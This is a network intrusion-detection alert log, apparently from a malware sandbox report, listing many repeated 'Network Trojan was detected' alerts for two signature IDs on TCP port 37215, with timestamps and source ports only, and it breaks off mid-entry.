              Timestamp:05/24/24-10:58:54.059533
              SID:2829579
              Source Port:55458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537977
              SID:2835222
              Source Port:44790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635629
              SID:2835222
              Source Port:51916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522275
              SID:2835222
              Source Port:55000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856598
              SID:2835222
              Source Port:46310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540637
              SID:2835222
              Source Port:36318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749285
              SID:2835222
              Source Port:48210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423383
              SID:2835222
              Source Port:36514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503536
              SID:2829579
              Source Port:58672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448043
              SID:2829579
              Source Port:35924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161791
              SID:2835222
              Source Port:59620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516341
              SID:2835222
              Source Port:50540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196807
              SID:2829579
              Source Port:37706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761954
              SID:2829579
              Source Port:40164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377295
              SID:2835222
              Source Port:43956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761815
              SID:2835222
              Source Port:55840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428267
              SID:2835222
              Source Port:54904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166852
              SID:2829579
              Source Port:57414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165729
              SID:2829579
              Source Port:57458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156379
              SID:2835222
              Source Port:59696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343646
              SID:2829579
              Source Port:58690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537321
              SID:2829579
              Source Port:35416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368588
              SID:2835222
              Source Port:60628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.146926
              SID:2835222
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623831
              SID:2829579
              Source Port:33640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625586
              SID:2829579
              Source Port:56582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505871
              SID:2829579
              Source Port:54246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377232
              SID:2835222
              Source Port:47130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430061
              SID:2835222
              Source Port:37480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635980
              SID:2829579
              Source Port:45004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552716
              SID:2835222
              Source Port:41246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502342
              SID:2829579
              Source Port:51822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486160
              SID:2835222
              Source Port:59706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664734
              SID:2829579
              Source Port:37950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123830
              SID:2835222
              Source Port:59062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400423
              SID:2829579
              Source Port:39922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483189
              SID:2835222
              Source Port:59490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204804
              SID:2829579
              Source Port:51278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396407
              SID:2835222
              Source Port:42346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148662
              SID:2835222
              Source Port:54304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368429
              SID:2829579
              Source Port:48980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522531
              SID:2835222
              Source Port:37074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987491
              SID:2829579
              Source Port:53004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202488
              SID:2829579
              Source Port:40998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403010
              SID:2829579
              Source Port:39544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572717
              SID:2829579
              Source Port:48204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568696
              SID:2829579
              Source Port:57806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544057
              SID:2835222
              Source Port:58332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487563
              SID:2829579
              Source Port:54656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505171
              SID:2829579
              Source Port:39800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404421
              SID:2835222
              Source Port:33368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537626
              SID:2829579
              Source Port:46884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281651
              SID:2829579
              Source Port:52072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076296
              SID:2835222
              Source Port:43270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583953
              SID:2835222
              Source Port:51076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859032
              SID:2829579
              Source Port:43244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168673
              SID:2829579
              Source Port:37328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424324
              SID:2835222
              Source Port:57092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553660
              SID:2835222
              Source Port:36482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988764
              SID:2829579
              Source Port:57750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329775
              SID:2829579
              Source Port:47342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428278
              SID:2835222
              Source Port:43944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045145
              SID:2829579
              Source Port:57380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432588
              SID:2835222
              Source Port:50696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404319
              SID:2829579
              Source Port:48974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149077
              SID:2835222
              Source Port:45658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451176
              SID:2829579
              Source Port:51658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233451
              SID:2835222
              Source Port:57072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130251
              SID:2829579
              Source Port:47706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640288
              SID:2835222
              Source Port:60816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662510
              SID:2835222
              Source Port:41316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482936
              SID:2829579
              Source Port:36688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535477
              SID:2829579
              Source Port:48754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483647
              SID:2829579
              Source Port:44226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116910
              SID:2835222
              Source Port:47992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623218
              SID:2835222
              Source Port:57602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103676
              SID:2829579
              Source Port:52222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428202
              SID:2835222
              Source Port:54342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538676
              SID:2835222
              Source Port:37446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553500
              SID:2829579
              Source Port:39190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055457
              SID:2829579
              Source Port:49278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634041
              SID:2829579
              Source Port:34876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517306
              SID:2835222
              Source Port:45196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749182
              SID:2835222
              Source Port:51060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378160
              SID:2835222
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819655
              SID:2835222
              Source Port:44972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398267
              SID:2829579
              Source Port:48842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368792
              SID:2829579
              Source Port:43464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121242
              SID:2829579
              Source Port:56488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480822
              SID:2829579
              Source Port:55202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503305
              SID:2835222
              Source Port:57512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361016
              SID:2835222
              Source Port:48952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535096
              SID:2829579
              Source Port:58130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573389
              SID:2829579
              Source Port:35482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880304
              SID:2835222
              Source Port:50806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341244
              SID:2829579
              Source Port:37272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099806
              SID:2835222
              Source Port:33870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355065
              SID:2829579
              Source Port:36940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.917991
              SID:2829579
              Source Port:49596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397393
              SID:2835222
              Source Port:51598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871991
              SID:2835222
              Source Port:41272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200648
              SID:2829579
              Source Port:53182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578107
              SID:2835222
              Source Port:44406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372405
              SID:2835222
              Source Port:53798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400611
              SID:2835222
              Source Port:52652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802384
              SID:2835222
              Source Port:35216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431642
              SID:2835222
              Source Port:56968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534853
              SID:2835222
              Source Port:33322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574667
              SID:2829579
              Source Port:48010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459615
              SID:2829579
              Source Port:39150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633660
              SID:2835222
              Source Port:50080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525139
              SID:2829579
              Source Port:51098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.865497
              SID:2835222
              Source Port:54146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926747
              SID:2835222
              Source Port:56060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802966
              SID:2835222
              Source Port:48634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923882
              SID:2835222
              Source Port:33186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394657
              SID:2829579
              Source Port:57410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821961
              SID:2835222
              Source Port:38088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640651
              SID:2835222
              Source Port:41684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636793
              SID:2829579
              Source Port:34412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552830
              SID:2829579
              Source Port:58058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.824663
              SID:2835222
              Source Port:41402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078228
              SID:2835222
              Source Port:34172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.107990
              SID:2829579
              Source Port:38206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362261
              SID:2829579
              Source Port:43088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456248
              SID:2835222
              Source Port:60850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422290
              SID:2835222
              Source Port:45480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989754
              SID:2829579
              Source Port:44626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329538
              SID:2829579
              Source Port:35128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517831
              SID:2835222
              Source Port:40512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186096
              SID:2829579
              Source Port:60146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.690168
              SID:2835222
              Source Port:41158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857421
              SID:2829579
              Source Port:34326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880852
              SID:2835222
              Source Port:34322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602678
              SID:2835222
              Source Port:50684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098083
              SID:2829579
              Source Port:59242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411571
              SID:2829579
              Source Port:51450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816148
              SID:2829579
              Source Port:34064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671552
              SID:2835222
              Source Port:54100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516575
              SID:2835222
              Source Port:40752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574501
              SID:2835222
              Source Port:40150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157717
              SID:2829579
              Source Port:54540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623106
              SID:2835222
              Source Port:59322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534859
              SID:2835222
              Source Port:48576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080801
              SID:2835222
              Source Port:52658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975700
              SID:2835222
              Source Port:60160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455131
              SID:2835222
              Source Port:56618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700959
              SID:2829579
              Source Port:59584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445201
              SID:2835222
              Source Port:42248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374787
              SID:2829579
              Source Port:52242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575195
              SID:2835222
              Source Port:51226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168154
              SID:2829579
              Source Port:34300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121525
              SID:2835222
              Source Port:57632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402185
              SID:2829579
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624799
              SID:2835222
              Source Port:45562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099498
              SID:2835222
              Source Port:53686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605837
              SID:2829579
              Source Port:39450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926268
              SID:2829579
              Source Port:53800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553591
              SID:2835222
              Source Port:42008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208950
              SID:2835222
              Source Port:34016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537777
              SID:2835222
              Source Port:42564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368705
              SID:2829579
              Source Port:48362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425771
              SID:2835222
              Source Port:39512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574722
              SID:2835222
              Source Port:36844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490868
              SID:2829579
              Source Port:56868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.829500
              SID:2835222
              Source Port:53566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583918
              SID:2835222
              Source Port:36246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300377
              SID:2835222
              Source Port:48552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194479
              SID:2829579
              Source Port:55234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482726
              SID:2829579
              Source Port:48234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484371
              SID:2829579
              Source Port:56506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210222
              SID:2835222
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100462
              SID:2829579
              Source Port:33440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100540
              SID:2835222
              Source Port:56630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664560
              SID:2829579
              Source Port:33044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452618
              SID:2829579
              Source Port:45422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586940
              SID:2835222
              Source Port:48960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361262
              SID:2829579
              Source Port:39110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584879
              SID:2835222
              Source Port:57970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313269
              SID:2829579
              Source Port:45894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489562
              SID:2835222
              Source Port:38710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578116
              SID:2829579
              Source Port:43030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491473
              SID:2835222
              Source Port:55406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343545
              SID:2829579
              Source Port:59192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.102281
              SID:2829579
              Source Port:55320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505705
              SID:2829579
              Source Port:48940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113704
              SID:2835222
              Source Port:40724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923459
              SID:2835222
              Source Port:35836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858449
              SID:2829579
              Source Port:43780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060145
              SID:2829579
              Source Port:49798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481697
              SID:2829579
              Source Port:37584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432532
              SID:2835222
              Source Port:41998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836361
              SID:2829579
              Source Port:44994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067952
              SID:2835222
              Source Port:60138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478443
              SID:2835222
              Source Port:51550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396307
              SID:2835222
              Source Port:48368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285115
              SID:2835222
              Source Port:38502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187404
